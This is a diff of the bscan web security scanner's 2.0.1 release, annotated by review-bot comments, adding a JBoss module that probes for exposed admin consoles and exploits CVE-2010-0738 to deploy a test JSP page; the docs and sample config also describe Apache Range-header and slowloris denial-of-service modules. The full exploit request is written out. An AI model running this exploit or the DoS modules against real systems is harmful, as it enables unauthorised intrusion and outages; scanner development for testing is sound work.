bscan 2.0.0 → 2.0.1
- data/CONFIG.rdoc +16 -0
- data/VERSION +1 -1
- data/lib/bscan/modules/jboss_vulns.rb +80 -0
- data/lib/bscan/utils/bscan_helper.rb +4 -4
- data/release_notes.txt +6 -0
- data/samples/config/big_request.txt +1 -1
- data/samples/config/conf +15 -3
- metadata +3 -3
- data/bscan.gemspec +0 -65
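--- a/data/CONFIG.rdoc
+++ b/data/CONFIG.rdoc
@@ -61,6 +61,10 @@ to 'true', the detailed zipped report will be attached. You'll ned
 by special separators (see inject_instead_of param below)
 * many_threads.rb - runs a static query in multiple threads. Can repeat
 patterns multiple times to increase impact on a server
+* kill_apache.rb - exploits HTTP header range vuln
+* slowloris.rb - slow HTTP reads and writes
+* jboss_vulns.rb - checks on presence of web-console, jmx-console and
+CVE-2010-0738 (jmx-console authentication by-pass)
 
 == injector.rb Module Parameters
 * bscan.injector.file - file with malicious patterns (e.g. Google's fuzzdb)
@@ -153,6 +157,18 @@ a response time and log an issue if a threshold is reached
 * bscan.kill_apache.range_nbr=n
 Number of elements in 'Range' header, default - 500
 
+== jboss_vuln.rb Module Parameters
+The module checks if web-console or jmx-console is present.
+It also checks if jmx-console authentication can be by-passed
+by injecting a 'hello' page through HTTP method 'HEAD'.
+To run the last one you need to set inject_page to 'true'.
+
+* bscan.jboss_vulns.hostport=host:port:proto
+Multiple entries for this param are OK
+* bscan.jboss_vulns.inject_page=true
+Set this to true to try by-passing jmx-console auth. It will
+try to inject a harmless HTML page @ /hello/hello.jsp
+
 == Burp Parameters
 To get a list of all Burp parameters, set log level (--loglevel to 2 or 3)
 and you'll see all of them in a log file.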
data/VERSION
CHANGED
@@ -1 +1 @@
|
|
1
|
-
2.0.
|
1
|
+
2.0.1
|
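--- a/data/lib/bscan/modules/jboss_vulns.rb
+++ b/data/lib/bscan/modules/jboss_vulns.rb
@@ -0,0 +1,80 @@
+require 'bscan/utils/bscan_helper.rb'
+
+module JbossVulns
+
+def run *args
+@prop_pref = 'bscan.jboss_vulns.'
+@prop_pref += args[2] + '.' if args[2] && args[2].length > 0
+@mid = args[2]?"JbossVulns.#{args[2]}.":'JbossVulns.'
+begin
+injectf = get_par 'inject_page', true
+hostports = get_par 'hostport',nil,true
+raise "'hostport' param must be provided" if not hostports
+hostports = [hostports] if not hostports.kind_of?(Array)
+
+hostports.each do |hp|
+host,port,proto = hp.split(':', 3)
+port = '80' if not port
+port = port.to_i
+proto = (port == 443 ? 'https':'http') if not proto
+https = (proto == 'https')
+
+Log 2, "#{@mid}run input: #{host} #{port} #{proto} #{injectf}"
+
+url = "#{proto}://#{host}:#{port}"
+
+reqb = "GET /jmx-console HTTP/1.1\r\n"
+reqe = "Host: #{host}:#{port}\r\n" +
+"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n\r\n"
+issue = Issue.new "#{@mid.chop}: JBoss Vuln Found", url, "Low", "Firm", nil, nil,nil
+
+rsp = make_request_socket host, port, https, reqb + reqe
+Log 2, "#{@mid}run jmx-console: #{reqb + reqe} #{rsp}"
+status = $1 if rsp =~ /^HTTP\/[^\s]+\s+(\d\d\d)/i
+if status != '404'
+issue.issue_detail = "/jmx-console is enabled"
+issue.url = url + "/jmx-console"
+issue.http_messages = [Message.new(reqb+reqe,rsp)]
+write_issue_state issue
+end
+
+reqb = "GET /web-console HTTP/1.1\r\n"
+rsp = make_request_socket host, port, https, reqb + reqe
+Log 2, "#{@mid}run web-console: #{reqb+reqe} #{rsp}"
+status = $1 if rsp =~ /^HTTP\/[^\s]+\s+(\d\d\d)/i
+if status != '404'
+issue.issue_detail = "/web-console is enabled"
+issue.url = url + "/web-console"
+issue.http_messages = [Message.new(reqb+reqe,rsp)]
+write_issue_state issue
+end
+if injectf
+reqb = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&" +
+"name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=hello.war&"+
+"argType=java.lang.String&arg1=hello&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&"+
+"arg3=%3CHTML%3E%3CBODY%3EHello%2C%20we've%20got%20a%20problem%20here!%3C%2FBODY%3E%3C%2FHTML%3E&argType=boolean&arg4=True "+
+"HTTP/1.1\r\n"
+Log 2, "#{@mid}run trying to inject hello: #{reqb+reqe} #{rsp}"
+rsp = make_request_socket host, port, https, reqb + reqe
+status = $1 if rsp =~ /^HTTP\/[^\s]+\s+(\d\d\d)/i
+if status != '404'
+regb = "GET /hello/hello.jsp HTTP/1.1\r\n"
+rsp = make_request_socket host, port, https, reqb + reqe
+if status == '200'
+issue.severity = 'Critical'
+issue.url = url + "/hello/hello.jsp"
+issue.issue_detail = "This JBoss instance is vulnerable to authentication by-pass and arbitrary code injection " +
+"as described here: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0738 "+
+"A test page has been injected at the following location: #{issue.url}"
+issue.http_messages = [Message.new(reqb+reqe,rsp)]
+write_issue_state issue
+end
+end
+end
+end
+rescue Exception => e
+Log 0, "#{@mid}run Exception: #{e.message}"
+Log 0, e.backtrace.join("\n")
+end
+end
+end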
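Review bot: The verification step after the HEAD request is broken: line 61 assigns `regb` (a typo for `reqb`), so line 62 re-sends the HEAD request instead of fetching /hello/hello.jsp, and `status` is never re-parsed from that second response, so the `status == '200'` test on line 63 still reflects the HEAD reply; lines 61–63 should read `reqb = "GET /hello/hello.jsp HTTP/1.1\r\n"`, `rsp = make_request_socket host, port, https, reqb + reqe`, `status = rsp =~ /^HTTP\/[^\s]+\s+(\d\d\d)/i ? $1 : nil`. The same stale-`status` problem affects the jmx-console and web-console probes (lines 33 and 44): `status = $1 if rsp =~ …` only assigns on a match, so an empty or non-HTTP response (whatever make_request_socket returns when the connection fails) leaves `status` nil or at its previous value, and `status != '404'` then logs the console as enabled, a false positive; reset `status = nil` before each request and skip the issue when it stays nil. `rescue Exception => e` on line 75 should be `rescue StandardError => e` so Interrupt and SystemExit still propagate, and because it wraps the whole `hostports.each`, one unreachable host aborts the scan of all remaining hosts — moving the begin/rescue inside the block isolates failures per host. `get_par 'inject_page', true` on line 10 defaults the intrusive step to on, contradicting CONFIG.rdoc, which says the injection runs only when inject_page is set to 'true'; the default should be `false`, and the issue detail should state that the deployed hello.war stays on the target until it is removed by hand.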
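--- a/data/lib/bscan/utils/bscan_helper.rb
+++ b/data/lib/bscan/utils/bscan_helper.rb
@@ -59,11 +59,11 @@ module BscanHelper
 @prop_pref + nm
 end
 
-def get_par k,defv
+def get_par k,defv,str=false
 p = @bscan_config[prop(k)]
-p = p.to_i if p
-p = true if p == 'true' or p == 'yes'
-p = false if p == 'false' or p == 'no'
+p = p.to_i if !str && p && p.to_i.to_s == p
+p = true if !str && (p == 'true' or p == 'yes')
+p = false if !str && (p == 'false' or p == 'no')
 p ? p:defv
 end
 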
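Review bot: `p ? p:defv` on line 67 returns the default whenever the parsed value is `false`, so a config entry of `false`/`no` is silently replaced by `defv`; with `get_par 'inject_page', true` in jboss_vulns.rb this means the injection step cannot be switched off from the config at all. Replace it with `p.nil? ? defv : p` so only a missing key falls back to the default. Line 64 still calls `p.to_i` when `str` is false; if `@bscan_config` yields an Array for a key given more than once (the `hostports.kind_of?(Array)` check in jboss_vulns.rb suggests it does), that raises NoMethodError for any caller that did not pass `str`, so guard it with `p.is_a?(String) &&`. The new positional flag `str=false` would also read better as a keyword, `def get_par(k, defv, str: false)`, though that changes the call site in jboss_vulns.rb.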
data/release_notes.txt
CHANGED
@@ -4,7 +4,7 @@ Accept: */*^M
|
|
4
4
|
Accept-Language: en^M
|
5
5
|
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)^M
|
6
6
|
Connection: close^M
|
7
|
-
Referer: http://
|
7
|
+
Referer: http://myserver.selfip.com/p^M
|
8
8
|
Content-Type: application/x-www-form-urlencoded^M
|
9
9
|
Content-Length: 14^M
|
10
10
|
Cookie: JSESSIONID=583A7E5D1FE791D694BBAA1ACC10EBB8^M
|
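--- a/data/samples/config/conf
+++ b/data/samples/config/conf
@@ -7,6 +7,19 @@ bscan.modules=bscan/modules/slowloris.rb
 bscan.url=http://target.one.com/path/?param=val
 bscan.url=http://target.two.com/path/?param=val
 
+# BScan smtp settings
+bscan.smtp.server=smtp.server.com
+bscan.smtp.port=25
+bscan.smtp.to=one@mail.com,two@mail.com
+bscan.smtp.from=bscan@server.com
+bscan.smtp.include_report=true
+
+#JbossVulns settings
+bscan.jboss_vulns.hostport=target.one.com:443:https
+bscan.jboss_vulns.hostport=target.two.com
+bscan.jboss_vulns.inject_page=true
+
+
 #KillApache settings
 bscan.kill_apache.hostport=target.one.com:443
 bscan.kill_apache.protocol=https
@@ -17,8 +30,6 @@ bscan.kill_apache.read_timeout=10
 bscan.kill_apache.range_nbr=500
 bscan.kill_apache.static_request=true
 
-
-
 #Slowloris settings: port is mandatory in 'hostport' param
 bscan.slowloris.hostport=target.three.com:443
 bscan.slowloris.protocol=https
@@ -28,9 +39,10 @@ bscan.slowloris.response_time_factor=5
 bscan.slowloris.sleep_time=200
 bscan.slowloris.con_nbr_per_thread=50
 bscan.slowloris.pack_per_con=10
+bscan.slowloris.health_check_int=2
+bscan.slowloris.delay_on_write=true
 bscan.slowloris.static_request=true
 
-
 # Injector settings
 bscan.injector.one.file=samples/config/injector.txt
 bscan.injector.one.inject_to_body=true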
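Review bot: The sample turns on `bscan.jboss_vulns.inject_page=true` (line 20), so anyone who copies this config gets a scanner that deploys a hello.war on every listed JBoss host instead of only probing for the consoles; a sample should ship intrusive options off, e.g. `bscan.jboss_vulns.inject_page=false` preceded by `# true makes the module deploy hello.war on the target; leave off unless that is intended`. The two new slowloris keys on lines 42–43, `health_check_int` and `delay_on_write`, do not appear in the CONFIG.rdoc changes of this commit; if they are new parameters they should be documented there with their defaults.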
metadata
CHANGED
@@ -2,14 +2,14 @@
|
|
2
2
|
name: bscan
|
3
3
|
version: !ruby/object:Gem::Version
|
4
4
|
prerelease:
|
5
|
-
version: 2.0.
|
5
|
+
version: 2.0.1
|
6
6
|
platform: ruby
|
7
7
|
authors:
|
8
8
|
- Oleg Gryb (ogryb)
|
9
9
|
autorequire:
|
10
10
|
bindir: bin
|
11
11
|
cert_chain: []
|
12
|
-
date: 2012-08-
|
12
|
+
date: 2012-08-25 00:00:00.000000000 Z
|
13
13
|
dependencies:
|
14
14
|
- !ruby/object:Gem::Dependency
|
15
15
|
name: buby
|
@@ -43,9 +43,9 @@ files:
|
|
43
43
|
- Rakefile
|
44
44
|
- VERSION
|
45
45
|
- bin/bscan
|
46
|
-
- bscan.gemspec
|
47
46
|
- lib/bscan.rb
|
48
47
|
- lib/bscan/modules/injector.rb
|
48
|
+
- lib/bscan/modules/jboss_vulns.rb
|
49
49
|
- lib/bscan/modules/kill_apache.rb
|
50
50
|
- lib/bscan/modules/many_threads.rb
|
51
51
|
- lib/bscan/modules/slowloris.rb
|
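--- a/data/bscan.gemspec
+++ b/data/bscan.gemspec
@@ -1,65 +0,0 @@
-# Generated by jeweler
-# DO NOT EDIT THIS FILE DIRECTLY
-# Instead, edit Jeweler::Tasks in Rakefile, and run 'rake gemspec'
-# -*- encoding: utf-8 -*-
-
-Gem::Specification.new do |s|
-s.name = "bscan"
-s.version = "2.0.0"
-
-s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
-s.authors = ["Oleg Gryb (ogryb)"]
-s.date = "2012-08-22"
-s.description = "BScan is a configurable and extendable web application security scanner that can be run from a command line headless (without UI). It's built on top of arguably the most popular commercial security testing tool Burp Suite from PortSwigger and Buby from Eric Monti and Timur Duehr"
-s.email = "oleg@gryb.info"
-s.executables = ["bscan"]
-s.extra_rdoc_files = [
-"CONFIG.rdoc",
-"README.rdoc",
-"bin/bscan",
-"release_notes.txt"
-]
-s.files = [
-"CONFIG.rdoc",
-"README.rdoc",
-"Rakefile",
-"VERSION",
-"bin/bscan",
-"bscan.gemspec",
-"lib/bscan.rb",
-"lib/bscan/modules/injector.rb",
-"lib/bscan/modules/kill_apache.rb",
-"lib/bscan/modules/many_threads.rb",
-"lib/bscan/modules/slowloris.rb",
-"lib/bscan/utils/bscan_helper.rb",
-"lib/bscan/utils/mailer.rb",
-"release_notes.txt",
-"samples/config/big_request.txt",
-"samples/config/conf",
-"samples/config/injector.txt",
-"samples/config/request.txt",
-"samples/config/xss.txt",
-"samples/headless-bscan.sh",
-"test.sh",
-"test/bscan_test.rb"
-]
-s.homepage = "http://gryb.info/bscan"
-s.rdoc_options = ["--main", "README.rdoc"]
-s.require_paths = ["lib"]
-s.rubygems_version = "1.8.24"
-s.summary = "BScan is an extendable and configurable command line web application security scanner"
-s.test_files = ["test/bscan_test.rb"]
-
-if s.respond_to? :specification_version then
-s.specification_version = 3
-
-if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
-s.add_runtime_dependency(%q<buby>, [">= 1.3.1"])
-else
-s.add_dependency(%q<buby>, [">= 1.3.1"])
-end
-else
-s.add_dependency(%q<buby>, [">= 1.3.1"])
-end
-end
-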